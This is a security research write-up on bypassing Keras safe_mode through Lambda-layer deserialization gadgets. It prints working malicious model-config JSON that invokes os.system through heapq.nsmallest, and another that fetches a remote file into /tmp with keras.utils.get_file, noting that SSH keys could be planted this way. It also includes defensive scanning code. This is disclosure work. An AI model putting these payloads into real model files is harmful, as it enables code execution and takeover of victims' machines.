Is TensorFlow Keras “Safe Mode” Actually Safe? Bypassing safe_mode Mitigation to Achieve Arbitrary Code Execution



Machine learning frameworks often rely on serialization and deserialization mechanisms to store and load models. However, improper code isolation and executable components in the models can lead to severe security risks.



For TensorFlow-based Keras models, a major deserialization issue was assigned the identifier CVE-2024-3660. By exploiting it, an attacker can inject and execute arbitrary code through a crafted malicious Keras model file. The exploit abuses the deserialization of Lambda layers, which can contain marshalled Python bytecode. An attacker could therefore embed malicious code in a Keras model file, leading to arbitrary code execution (ACE) when an unsuspecting victim loads the model.

In response, Keras introduced a safe_mode parameter in version 2.13 to mitigate this risk. By default, safe_mode is set to True, which prevents the deserialization of Lambda layers that could execute arbitrary code. With the fix, loading a model that contains a marshalled Lambda function in safe mode raises an exception instead of unmarshaling the code.

```python
if (
    isinstance(fn_config, dict)
    and "class_name" in fn_config
    and fn_config["class_name"] == "__lambda__"
):
    cls._raise_for_lambda_deserialization("function", safe_mode)
    inner_config = fn_config["config"]
    fn = python_utils.func_load(
        inner_config["code"],
        defaults=inner_config["defaults"],
        closure=inner_config["closure"],
    )
```

Safe mode for Lambda layer implementation

This fix is a good first step, but a question remains: is it still possible to craft a model that abuses deserialization to execute a malicious payload even in safe mode? To answer it, we start by examining how Keras implements model deserialization.

Keras Deserialization Mechanism

The model loading process in Keras begins with the function saving_lib.load_model, which identifies the model source (file, directory, or Hugging Face repository) and then calls the corresponding loader. Regardless of the source, each method deserializes the model from the config.json extracted from the model, invoking _model_from_config. This function, in turn, calls deserialize_keras_object, which is where the deserialization logic is executed.
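
Because a .keras file is a zip archive, the config.json that drives this whole process can be inspected without calling load_model at all. The following is a minimal sketch using only the standard library. It assumes the Keras 3 archive layout, where the configuration is stored as a top-level config.json entry. The helper name read_keras_config is our own, chosen for illustration.

```python
import json
import zipfile


def read_keras_config(path_or_file):
    """Return the parsed config.json from a .keras archive.

    Assumes the Keras 3 layout, with the model configuration stored as a
    top-level "config.json" entry. Nothing from Keras is imported and no
    layer is deserialized, so this is safe to run on an untrusted file.
    """
    with zipfile.ZipFile(path_or_file) as archive:
        with archive.open("config.json") as fh:
            # json.load accepts a binary file object (bytes input is decoded).
            return json.load(fh)
```

For example, read_keras_config("untrusted_model.keras")["class_name"] returns the top-level class name (such as "Functional") before any Keras code runs.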

This function recursively interprets the dictionary structure, converting its elements into the corresponding Python objects. Two components are particularly interesting from an attacker’s perspective. The first is _retrieve_class_or_fn, a function that retrieves arbitrary classes and functions from the modules named in the JSON configuration. The second is the Keras Functional API, which gives developers a powerful and flexible way to build complex graph topologies and also provides a primitive for executing deserialized objects at load time. Let’s build, step by step, a functional model that demonstrates arbitrary code execution at load time. The following listing contains a dump of a functional model with only the mandatory fields:

```json
{
  "class_name": "Functional",
  "name": "functional",
  "config": {
    "input_layers": [],
    "layers": [],
    "output_layers": []
  }
}
```

Serialized Functional layer

Input and output layers are necessary for a Keras model, specifying the input and output tensors. Every model must have at least one input and one output layer, representing the starting and ending points of the computation graph. While these layers are not used in exploitation, they are required placeholders to ensure that Lambda layers can be loaded and executed without triggering exceptions.

```json
"input_layers": [
  ["input_layer", 0, 0]
],
"output_layers": [
  ["input_layer", 0, 0]
],
```

Input and output layers of the functional model

The layers section must contain at least one input layer:

```json
{
  "class_name": "InputLayer",
  "config": {
    "batch_shape": [],
    "dtype": "int64",
    "name": "encoder_inputs"
  },
  "inbound_nodes": [],
  "module": "keras.layers",
  "name": "input_layer"
}
```

Input layer

Finally, the payload layer is a Lambda layer. Unlike the exploit for the previous vulnerability (CVE-2024-3660), this layer contains no marshalled Python bytecode. Instead, it contains the following keys:

```json
{
  "class_name": "Lambda",
  "config": {
    "arguments": {},
    "function": {}
  },
  "inbound_nodes": []
}
```

Empty Lambda layer

The function is invoked from the Lambda layer’s call method. This method calls the function resolved from the “function” parameter, passing a tensor object (constructed from the “inbound_nodes” JSON section) as the first positional argument, together with keyword arguments taken from the “arguments” JSON section.

```python
kwargs = {k: v for k, v in self.arguments.items()}
if self._fn_expects_mask_arg:
    kwargs["mask"] = mask
if self._fn_expects_training_arg:
    kwargs["training"] = training
return self.function(inputs, **kwargs)
```

Implementation of the Lambda call in the Keras library

So, even without any embedded Python code (which safe_mode would block), the Lambda layer gives us a very strong primitive: execution of any Python function that already exists on the victim’s machine. There are, however, certain limitations on how this function is called:

- All arguments other than the first must be passed by name (as keyword arguments).

- The first positional argument is always a tensor, built from the “inbound_nodes” section of the model configuration.
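
The calling convention above can be modeled in plain Python. The sketch below is a simplified, hypothetical stand-in for the Lambda layer, not Keras code: the names FakeLambda and describe are ours, a plain list replaces the real tensor, and the mask and training handling is left out. It shows that the configured function always receives the inbound tensor positionally and every entry of “arguments” by name.

```python
class FakeLambda:
    """Hypothetical, simplified model of how a Lambda layer invokes its function.

    Not Keras code: mask/training handling is omitted and a plain Python list
    stands in for the tensor built from "inbound_nodes".
    """

    def __init__(self, function, arguments=None):
        self.function = function          # resolved from the "function" config key
        self.arguments = arguments or {}  # taken from the "arguments" config key

    def call(self, inputs):
        # Every configured argument is forwarded by name...
        kwargs = {k: v for k, v in self.arguments.items()}
        # ...while the inbound tensor is always the first positional argument.
        return self.function(inputs, **kwargs)


def describe(first, **named):
    """Harmless stand-in for a gadget: reports what it was called with."""
    return {"first": first, "named": named}


layer = FakeLambda(describe, arguments={"greeting": "hello"})
print(layer.call([1.0]))  # {'first': [1.0], 'named': {'greeting': 'hello'}}
```

Any candidate gadget therefore has to tolerate an unexpected first positional value and take everything else as keyword arguments.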

Exploitation before Keras version 3.9

Exploiting this vulnerability relies on identifying suitable functions (also known as “gadgets”) that meet the constraints imposed by the Keras deserialization process described above. The main challenge is that the function must:

- Accept a tensor as its first positional argument without failing, since the tensor is always passed.

- Accept additional named arguments.

- Be capable of performing an operation useful to the attacker, such as executing an arbitrary shell command.

While these constraints reduce the number of exploitable functions, they do not eliminate the possibility of successful exploitation.

Before the recent Keras version 3.9, an attacker could reference functions from any module available for import. The most useful function for exploitation was heapq.nsmallest from Python’s standard heapq module.

```python
heapq.nsmallest(n, iterable, key=None)
```

heapq.nsmallest function signature

This function takes three arguments:

- n: The number of smallest elements to return.

- iterable: The dataset to process.

- key: A function applied to each element for comparison.

Since heapq.nsmallest does not enforce a specific type for its first argument n and only uses it in comparisons whose results are evaluated as booleans, a single-element tensor is accepted in place of an integer. The function therefore meets all the requirements for successful exploitation.
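
The reason key turns nsmallest into an execution primitive can be seen with a harmless function. In the sketch below, record is our own illustrative helper that simply logs its input. nsmallest calls the key function once for every element of iterable, so any callable supplied as key receives each element as its sole argument.

```python
import heapq

calls = []


def record(item):
    """Harmless key function: logs each element it is called with."""
    calls.append(item)
    return len(item)


# n=1 mirrors the single-element value passed as the first argument.
result = heapq.nsmallest(1, ["short", "longer"], key=record)

print(result)  # ['short']
print(calls)   # ['short', 'longer'], one key call per element
```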

The key argument is the central component: it is a function applied to each element of the iterable. It can be any callable that executes code, such as exec, eval, os.system, or subprocess.Popen, while the iterable holds the arguments to be passed to that callable. Combining all the parts, the complete Lambda layer for the exploit is:

```json
{
  "class_name": "Lambda",
  "config": {
    "arguments": {
      "iterable": ["ls -l"],
      "key": {
        "class_name": "function",
        "config": "system",
        "module": "os"
      }
    },
    "function": {
      "class_name": "function",
      "config": "nsmallest",
      "module": "heapq"
    },
    "name": "lambda"
  },
  "inbound_nodes": [
    {
      "args": [
        {
          "class_name": "__tensor__",
          "config": {
            "dtype": "float32",
            "value": [1]
          }
        }
      ]
    }
  ],
  "module": "keras.layers",
  "name": "lambda"
}
```

Lambda layer that demonstrates shell command execution

A Keras model containing this Lambda layer causes the shell command “ls -l” to execute as soon as the model is loaded, even when safe_mode is enabled!

```python
from keras.models import load_model

# safe_mode=True is already the default; it is passed explicitly for emphasis.
load_model("malicious_model.keras", safe_mode=True)
```

Loading a Keras model in safe_mode

Exploitation after Keras version 3.9

Keras 3.9, released on 4 March 2025, partially fixes this issue by refusing to load functions from modules outside the Keras packages. The code below ensures that a referenced function belongs to one of the Keras libraries.

```python
package = module.split(".", maxsplit=1)[0]
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
    try:
        mod = importlib.import_module(module)
        obj = vars(mod).get(name, None)
        if obj is not None:
            return obj
    # ... (excerpt: the except clause and the rest of the function are omitted)
```

Validation of the module name during deserialization of a Keras object
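
The effect of this check can be reproduced outside Keras. The following is a hypothetical sketch: is_allowed_module mirrors the package test in the excerpt, while resolve_function is our own simplified resolver that contrasts the unrestricted pre-3.9 lookup (restrict=False) with the restricted one. Note that only the top-level package is examined, so any attribute of any keras.* module still passes.

```python
import importlib

# Same package set as in the Keras 3.9 excerpt.
ALLOWED_PACKAGES = {"keras", "keras_hub", "keras_cv", "keras_nlp"}


def is_allowed_module(module):
    """Mirror of the 3.9 check: only the top-level package name is inspected."""
    package = module.split(".", maxsplit=1)[0]
    return package in ALLOWED_PACKAGES


def resolve_function(module, name, restrict=True):
    """Hypothetical resolver (not Keras code).

    restrict=False approximates the pre-3.9 behavior of importing any module;
    restrict=True applies the package allowlist first. Returns None when the
    module is disallowed or the attribute does not exist.
    """
    if restrict and not is_allowed_module(module):
        return None
    mod = importlib.import_module(module)
    return vars(mod).get(name, None)


print(is_allowed_module("keras.utils"))  # True
print(is_allowed_module("heapq"))        # False
```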

While this is a good start, the fix only partially solves the problem: it blocks the easiest gadgets, but the Keras packages themselves contain dangerous functions that can still be used for code execution. One such function is keras.utils.get_file, which is designed to download a file from a specified URL (and, if instructed, extract it) and which can be abused to achieve arbitrary code execution.

The keras.utils.get_file function’s parameters include fname, the file name, and origin, the file’s URL to download. If fname is set to None, the function uses the file name from the origin URL.

The cache_dir and cache_subdir parameters control the directory the file is saved to. This makes the function a perfect gadget for the deserialization primitive explained above: an attacker can download a file to an arbitrary location on the file system, which in turn can lead to arbitrary code execution. For example, an attacker could download a malicious authorized_keys file into the user’s SSH folder, gaining full SSH access to the victim’s machine.
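
To see why cache_dir and cache_subdir decide where the file lands, here is a rough approximation of the destination-path logic. It is not the Keras implementation. approximate_get_file_path is a hypothetical helper, and it assumes that fname defaults to the last path component of the URL, that the target directory is os.path.join(cache_dir, cache_subdir), and that cache_dir defaults to ~/.keras. It ignores hash checking, extraction, and any fallback behavior of the real function. The example.com URL is a placeholder.

```python
import os
import urllib.parse


def approximate_get_file_path(origin, fname=None, cache_dir=None, cache_subdir="datasets"):
    """Rough, hypothetical approximation of where keras.utils.get_file writes a file."""
    if not fname:
        # Assumption: the file name is taken from the last component of the URL path.
        fname = os.path.basename(urllib.parse.urlsplit(origin).path)
    if cache_dir is None:
        # Assumption: the default cache directory is ~/.keras.
        cache_dir = os.path.join(os.path.expanduser("~"), ".keras")
    return os.path.join(cache_dir, cache_subdir, fname)


print(approximate_get_file_path("https://example.com/files/index.js",
                                cache_dir="/tmp", cache_subdir=""))
# /tmp/index.js
```

Since both directory components come from the model’s “arguments” section, the model file, not the victim, chooses the write location.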

The example below demonstrates downloading an arbitrary file to the victim machine’s /tmp directory:

```json
{
  "class_name": "Lambda",
  "config": {
    "arguments": {
      "origin": "https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js",
      "cache_dir": "/tmp",
      "cache_subdir": "",
      "force_download": true
    },
    "function": {
      "class_name": "function",
      "config": "get_file",
      "module": "keras.utils"
    }
  }
}
```

Lambda layer that demonstrates arbitrary file overwrite from a remote file

Summary

The vulnerability in Keras is not the first security issue related to code execution during deserialization. As this case shows, relying on patches for individual vulnerabilities is insufficient. Proper sandboxing and security scanning of untrusted ML models can mitigate, or completely negate, the security impact of such issues. Without strict execution controls and isolation, zero-day vulnerabilities such as the one above can allow attackers to bypass security mechanisms, putting users at risk.
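
On the scanning side, the following is a minimal heuristic sketch of a static check over a parsed config.json. The names scan_config and RISKY_FUNCTIONS are ours, and the denylist is an assumption containing only the gadget discussed here. It flags Lambda layers, marshalled __lambda__ payloads, and serialized function references without importing or executing anything from the model. It is an illustration, not a substitute for a maintained model scanner.

```python
# Hypothetical denylist: only the gadget discussed in this article.
RISKY_FUNCTIONS = {("keras.utils", "get_file")}


def scan_config(node, path="$"):
    """Walk a parsed Keras config and return human-readable findings.

    Heuristic sketch: inspects only the JSON structure and never imports or
    executes anything referenced by the model.
    """
    findings = []
    if isinstance(node, dict):
        class_name = node.get("class_name")
        if class_name == "Lambda":
            findings.append(f"{path}: Lambda layer")
        elif class_name == "__lambda__":
            findings.append(f"{path}: marshalled Python bytecode")
        elif class_name == "function":
            module, name = node.get("module"), node.get("config")
            kind = "known-risky function" if (module, name) in RISKY_FUNCTIONS else "function reference"
            findings.append(f"{path}: {kind} {module}.{name}")
        for key, value in node.items():
            findings.extend(scan_config(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            findings.extend(scan_config(item, f"{path}[{i}]"))
    return findings
```

An empty result means no Lambda layers or function references were found in the configuration; any finding warrants manual review before the model is loaded.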

Make sure to regularly check out the JFrog Security Research center for more information about how to protect yourself from this and other AI/ML vulnerabilities.